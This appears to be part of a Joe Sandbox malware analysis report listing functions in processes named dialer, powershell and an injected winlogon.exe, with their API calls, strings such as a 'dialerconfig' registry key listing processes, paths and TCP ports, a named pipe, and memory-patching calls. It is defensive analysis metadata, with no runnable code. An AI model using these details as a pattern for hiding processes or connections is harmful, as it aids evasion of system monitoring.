dialersvc64, xrefs: 00007FF62DC31AE2

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: bc323f223f328d9942975ed76fb31be0b9bb0e69076b0900d74dee5e992e6bdf
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: B2415D32704B469AEB508F29E8442ED33B9FB88B99B044135EE4D87B64EF39D14AC311

Function 00007FF62DC31000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF62DC31034
RegDeleteKeyW.ADVAPI32 ref: 00007FF62DC31045
RegEnumKeyExW.ADVAPI32 ref: 00007FF62DC31082
RegCloseKey.ADVAPI32 ref: 00007FF62DC31093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF62DC310B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF62DC31026, 00007FF62DC3109C

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: d0b5b7928f677373f6218732a34077de008f010bcf91340bbd20a923e190169b
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: F8118D32B1CA8585EFA08F29EC447F92378FB84758F405235D64D4A698EF7CD149CB25

Function 00007FF62DC32C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF62DC32C53
WriteFile.KERNEL32 ref: 00007FF62DC32C7B
WriteFile.KERNEL32 ref: 00007FF62DC32C9E
CloseHandle.KERNEL32 ref: 00007FF62DC32CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF62DC32C30

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: 81aac69a6c0172308ea04a202282475be972511839c2354eabeb68fd0b4e77a1
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 21119E32B14B5082FF508B09E8083A9A774FBC8BE0F448235DA5943B94DF7CD50AC751

Function 00007FF62DC31A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF62DC31914), ref: 00007FF62DC31A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF62DC31914), ref: 00007FF62DC31A37

Strings

ntdll.dll, xrefs: 00007FF62DC31A1A

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: 1b98ea424a71008df11155ca192094bdacba776b43a19e7754d705049f213f56
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: A0D0C994F1664382EE999B6A6C551F06379AF99B86B884430CD5E86350FE2CD0978221

Analysis Process: powershell.exePID: 5172, Parent PID: 4088COMMON

Executed Functions

Function 00007FFE1652EE95 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2533843054.00007FFE1652D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE1652D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe1652d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbbaf1b7905b84d1e0d70d8986d7dc783504613b463ad0098612bba932b27bf
Instruction ID: 4c2d2c539e0954d25d63f1ff0b40787cbc935170a08ba7a8d497868995d2efb3
Opcode Fuzzy Hash: 1bbbaf1b7905b84d1e0d70d8986d7dc783504613b463ad0098612bba932b27bf
Instruction Fuzzy Hash: F211633150CF098F9BA8EF1DE4859567BE0FB98320B100AAFD459C7666D731F885CB81

Function 00007FFE16644665 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2535248021.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe16640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63784c293fe55385c9d80fcf41ae6b2e592c85d349da31d146bd4394a7a44650
Instruction ID: f62acd0df57965914ce4d0b2d48d1c6a0247ada78c1ed88148a770287935c293
Opcode Fuzzy Hash: 63784c293fe55385c9d80fcf41ae6b2e592c85d349da31d146bd4394a7a44650
Instruction Fuzzy Hash: F101677111CB0C4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3661D736E891CB46

Function 00007FFE167153E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2540169120.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe16710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a64a44fc35a18793a835fa3da52b3208daba8ef6c0300732c8ffae3af02637
Instruction ID: a46e46193b8ee056dd5615eed0e1c77dc2dc4ad03be3a52384000256e318be7a
Opcode Fuzzy Hash: 92a64a44fc35a18793a835fa3da52b3208daba8ef6c0300732c8ffae3af02637
Instruction Fuzzy Hash: 37F0A73131CF044FD748EE1DD445661B3D0FBA8310F20462FE449C3251DA25E4818782

Function 00007FFE16714A27 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2540169120.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe16710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ba16c86457fc68b76fe5d737b980af2f109d5bcaff8f43f61cf2aa5c9b8b31
Instruction ID: bdc23efabb8b92862c44c2049be556698f1ae58f0012aa08d1ba1f313a986671
Opcode Fuzzy Hash: 94ba16c86457fc68b76fe5d737b980af2f109d5bcaff8f43f61cf2aa5c9b8b31
Instruction Fuzzy Hash: B8E0653260C8048FDA68EB0DE0419E973E1EF84321B1100FBE15DC7176CA25FC518784

Function 00007FFE16714CDA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2540169120.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe16710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f3bcb1bc2a59f47e27b042f1432e9baaaacbddbd252dc23facb4b5fb76ca04
Instruction ID: 4dedd6e6ee35e3d3ad0525c5cbdaea61bdcada998496b2d0c25c6401b6e41d08
Opcode Fuzzy Hash: 13f3bcb1bc2a59f47e27b042f1432e9baaaacbddbd252dc23facb4b5fb76ca04
Instruction Fuzzy Hash: A9E06D3260D4088FDB58EB0DE045AE873E1EF84321B5000FBE25EC7176CA26EC408780

Analysis Process: winlogon.exePID: 580, Parent PID: 5852COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 000001881F881650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001881F88165B
HeapAlloc.KERNEL32 ref: 000001881F88166A

Part of subcall function 000001881F881274: GetProcessHeap.KERNEL32 ref: 000001881F88127A
Part of subcall function 000001881F881274: HeapAlloc.KERNEL32 ref: 000001881F881289
Part of subcall function 000001881F881274: GetProcessHeap.KERNEL32 ref: 000001881F8812A3
Part of subcall function 000001881F881274: HeapAlloc.KERNEL32 ref: 000001881F8812B4

RegOpenKeyExW.ADVAPI32 ref: 000001881F8816DA
RegOpenKeyExW.ADVAPI32 ref: 000001881F881707
RegCloseKey.ADVAPI32 ref: 000001881F881721
RegOpenKeyExW.ADVAPI32 ref: 000001881F881741
RegCloseKey.ADVAPI32 ref: 000001881F88175C
RegOpenKeyExW.ADVAPI32 ref: 000001881F88177C
RegCloseKey.ADVAPI32 ref: 000001881F881797
RegOpenKeyExW.ADVAPI32 ref: 000001881F8817B7
RegCloseKey.ADVAPI32 ref: 000001881F8817D2
RegOpenKeyExW.ADVAPI32 ref: 000001881F8817F2
RegCloseKey.ADVAPI32 ref: 000001881F88180D
RegOpenKeyExW.ADVAPI32 ref: 000001881F88182D
RegCloseKey.ADVAPI32 ref: 000001881F881848
RegOpenKeyExW.ADVAPI32 ref: 000001881F881868
RegCloseKey.ADVAPI32 ref: 000001881F881883
RegOpenKeyExW.ADVAPI32 ref: 000001881F8818A3
RegCloseKey.ADVAPI32 ref: 000001881F8818BE
RegCloseKey.ADVAPI32 ref: 000001881F8818C8

Part of subcall function 000001881F8812C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001881F881326
Part of subcall function 000001881F8812C8: GetProcessHeap.KERNEL32 ref: 000001881F881334
Part of subcall function 000001881F8812C8: HeapAlloc.KERNEL32 ref: 000001881F881345
Part of subcall function 000001881F8812C8: RegEnumValueW.ADVAPI32 ref: 000001881F8813A1
Part of subcall function 000001881F8812C8: GetProcessHeap.KERNEL32 ref: 000001881F8813E9
Part of subcall function 000001881F8812C8: HeapAlloc.KERNEL32 ref: 000001881F8813F7
Part of subcall function 000001881F8812C8: GetProcessHeap.KERNEL32 ref: 000001881F88141B
Part of subcall function 000001881F8812C8: HeapFree.KERNEL32 ref: 000001881F881429
Part of subcall function 000001881F8812C8: lstrlenW.KERNEL32 ref: 000001881F881432
Part of subcall function 000001881F8812C8: GetProcessHeap.KERNEL32 ref: 000001881F881440
Part of subcall function 000001881F8812C8: HeapAlloc.KERNEL32 ref: 000001881F88144E

Strings

service_names, xrefs: 000001881F8817EB
SOFTWARE\dialerconfig, xrefs: 000001881F8816BA
tcp_local, xrefs: 000001881F881826
udp, xrefs: 000001881F88189C
paths, xrefs: 000001881F8817B0
tcp_remote, xrefs: 000001881F881861
process_names, xrefs: 000001881F881775
pid, xrefs: 000001881F88173A
startup, xrefs: 000001881F8816FD

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 7b5bf323d3c7063926c0f21bac86af9fc8ecc7acc10ba5a8c508aeabe5aa0283
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: F1711C76310E5089EF30DF65E899AD967B8F7A4B88F80A111DE4E57B29DF38C646C300

Function 000001881F885C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001881F885C4B
GetThreadContext.KERNEL32 ref: 000001881F885DB5

Part of subcall function 000001881F885A40: GetCurrentThreadId.KERNEL32 ref: 000001881F885A44

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 34da17d186dace7ab55b0f25c9ab7e2110823a0e48f2838721e5485a6c97c2f4
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: E5D1EE76208B8885DB70DB0AE49879A77B0F3D8B94F504116EACD47BA9DF3CC652CB14

Function 000001881F8851B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001881F885236

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 4608dc5228e56962241cedb8ee7be184275d4ae7c8cae90912b49e716acf2fa2
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: 9402E936219B808AE760CB59F49879EB7A0F3D5790F508015EA8E87BA8DF7CC595CB10

Function 000001881F883878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001881F883886
GetCurrentProcess.KERNEL32 ref: 000001881F8838B4
VirtualProtectEx.KERNEL32 ref: 000001881F8838D6
GetCurrentProcess.KERNEL32 ref: 000001881F8838F4
VirtualProtectEx.KERNEL32 ref: 000001881F883915

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 7538cfb4470f455f95e15d707486b13477849691f0fca47296fe7752544c57ce
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 72115235704B4087EF249B11F40CB99A674F795B84F848025DE9907764EF3DC606C700

Function 000001881F883AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001881F883B46
VirtualAlloc.KERNEL32 ref: 000001881F883B80

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 10839fe09dff9793d249b3a1a953606894e0f7897eb873133ef188b36ddd8b52
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 6E316772219A8489EB30DB15E058B9EA3A4F398784F908525F5CE47BB9DF7DC752CB00

Function 000001881F883458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001881F88347A
PathFindFileNameW.SHLWAPI ref: 000001881F883489

Part of subcall function 000001881F883930: StrCmpNIW.SHLWAPI ref: 000001881F883948

Part of subcall function 000001881F883878: GetModuleHandleW.KERNEL32 ref: 000001881F883886
Part of subcall function 000001881F883878: GetCurrentProcess.KERNEL32 ref: 000001881F8838B4
Part of subcall function 000001881F883878: VirtualProtectEx.KERNEL32 ref: 000001881F8838D6
Part of subcall function 000001881F883878: GetCurrentProcess.KERNEL32 ref: 000001881F8838F4
Part of subcall function 000001881F883878: VirtualProtectEx.KERNEL32 ref: 000001881F883915

CreateThread.KERNEL32 ref: 000001881F8834D7

Part of subcall function 000001881F881EB4: GetCurrentThread.KERNEL32 ref: 000001881F881EBF

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 13e8acfab536a429de5603464f128022686c72f5aab015090231be7032c8fa36
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 531180B06206019EFB719721F90EFD92694BBB4318FC4D0299A46C65E4EF3DC38AC310

Function 000001881F884ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001881F884ED4
VirtualProtect.KERNEL32 ref: 000001881F884F17
FlushInstructionCache.KERNEL32 ref: 000001881F884F2C

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 3911ca1262885e09f182ab176ce0bf4b3f4dc102c1d4c2f005f4a8c19350374f
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 25F0BD76218B4485D630EB05E455B8A67A0E3D87E4F948115B98D07B69CE38C692CB04

Function 000001881F852908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001881F8529AA
LoadLibraryA.KERNELBASE ref: 000001881F852A31

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 2b68042cd4d0b6f15cbbc25190879c452935d1376f81c0ac7fa7ef6855db9924
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 9E6100327012518BEB78CF55D448BACB3A2FB24B94F94C125EA1A077A5DF38EA53C701

Function 000001881F881C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001881F881650: GetProcessHeap.KERNEL32 ref: 000001881F88165B
Part of subcall function 000001881F881650: HeapAlloc.KERNEL32 ref: 000001881F88166A
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F8816DA
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F881707
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F881721
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F881741
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F88175C
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F88177C
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F881797
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F8817B7
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F8817D2
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F8817F2

Sleep.KERNEL32 ref: 000001881F881C43
SleepEx.KERNELBASE ref: 000001881F881C49

Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F88180D
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F88182D
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F881848
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F881868
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F881883
Part of subcall function 000001881F881650: RegOpenKeyExW.ADVAPI32 ref: 000001881F8818A3
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F8818BE
Part of subcall function 000001881F881650: RegCloseKey.ADVAPI32 ref: 000001881F8818C8

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: cee8c556753cd99ba20fb6154230469bef9cdefe512be036a43fb832ce0df58c
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: D831E075300E0199FB709F36EA49BDA53A5AB64FC4F94D021DE0A876D6EF34CA52C350

Function 000001881F8B2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001881F8B29AA

Memory Dump Source

Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: fd8df4c298c1c8e13cbbdff4bcfe387399a6489d5f2c982aa425d100305d090b
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 2F610D327016598BEB79CF29D488BADB391FB24BA4F94C125DA1907785DF38EA53C700

Non-executed Functions

Function 000001881F882CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001881F882D80
lstrlenW.KERNEL32 ref: 000001881F882FBA

Part of subcall function 000001881F881A14: OpenProcess.KERNEL32 ref: 000001881F881A3A
Part of subcall function 000001881F881A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001881F881A58
Part of subcall function 000001881F881A14: PathFindFileNameW.SHLWAPI ref: 000001881F881A67
Part of subcall function 000001881F881A14: lstrlenW.KERNEL32 ref: 000001881F881A73
Part of subcall function 000001881F881A14: StrCpyW.SHLWAPI ref: 000001881F881A86
Part of subcall function 000001881F881A14: CloseHandle.KERNEL32 ref: 000001881F881A94

GetProcAddress.KERNEL32 ref: 000001881F882D95

Part of subcall function 000001881F881554: StrCmpIW.SHLWAPI ref: 000001881F881585

Part of subcall function 000001881F883930: StrCmpNIW.SHLWAPI ref: 000001881F883948

StrCmpNIW.SHLWAPI ref: 000001881F882DD8
lstrlenW.KERNEL32 ref: 000001881F882F00

Strings

ntdll.dll, xrefs: 000001881F882D79
\Device\Nsi, xrefs: 000001881F882DCB
NtQueryObject, xrefs: 000001881F882D8B

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 581d49e89a49139071c6abb250319cacab398d7922d51b4804f4d3ee627147b8
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: FFB1B472220A908AEB74DF25D548FE9B3A4FBA4B84F94D016EE49537A4DF35CE42C340

Function 000001881F887E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001881F887E8C
RtlCaptureContext.NTDLL ref: 000001881F887EB9
RtlLookupFunctionEntry.NTDLL ref: 000001881F887ED3
RtlVirtualUnwind.NTDLL ref: 000001881F887F14
IsDebuggerPresent.KERNEL32 ref: 000001881F887F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001881F887F89
UnhandledExceptionFilter.KERNEL32 ref: 000001881F887F94

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 9779ee220004ae3550ad9022ea637176321fa6dd12a88af7c38ed87f2ec9ab6d
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 12315072205B809AEB70DF60E844BED7374F794744F84842ADA4E57B98EF38C649C710

Function 000001881F88B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001881F88B585
